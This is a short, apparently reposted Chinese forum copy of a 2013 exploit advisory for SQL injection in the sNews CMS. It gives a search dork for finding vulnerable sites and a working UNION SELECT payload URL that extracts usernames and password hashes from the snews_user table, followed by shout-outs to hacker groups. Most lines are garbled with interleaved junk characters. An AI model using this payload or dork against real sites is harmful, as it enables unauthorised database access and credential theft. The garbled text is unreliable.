标题: CMS snews SQL Injection Vulnerability5 a0 L# B E& \6 n4 K
作者: By onestree: J6 }6 p* S0 x
下载地址 : http://snewscms.com/
+ `3 Q& d" K2 K3 @3 e/ ?; l测试平台 : ubuntu 12.10 / win 7
$ A: N& z# ]# D. v4 C* P关键词: inurl:"tanyakan pada rumput yang bergoyang"4 @3 W: g- y5 |+ T# I6 o1 ~! D
2 v8 L4 v' ?4 ] r7 v
( {- m7 I+ r7 S$ W5 I% m4 s1 m*************************************************************
% `' `% e, S2 ^7 V6 ^ L
* \0 y7 o) V. b* o5 CSQL poc:) ]9 q( S% W$ t. {2 C2 a) m$ [
0 @4 X+ Z, M' |
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
/ M) L$ a( t* B + f, I. m- Z/ m( N
示例
A7 C; V) b2 c
0 j+ C' H% f4 f% ?% v0 fhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*1 Y. T6 i# [2 ?+ t# s; U0 Y: p
0 G( }$ [) v: q
. F7 W% E9 L9 W; c( t
致谢:
; s$ f7 w/ z/ l b" A" a( R
9 S# K5 A: }- a, | Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
& w3 [3 x) H j+ [) P8 R, l7 c # t s- N$ x9 R* @2 S. M
indonesiancoder - moeslimh4x0r - go-coder5 _+ R+ ^% d3 r' B9 G! `8 x% H
9 I( ]6 B! m& R2 ospesial my hunny :*
% E. W# Q4 ]& X5 N7 T" d8 m. h' D |
发表于 2013-1-23 08:55:06
收藏
支持
反对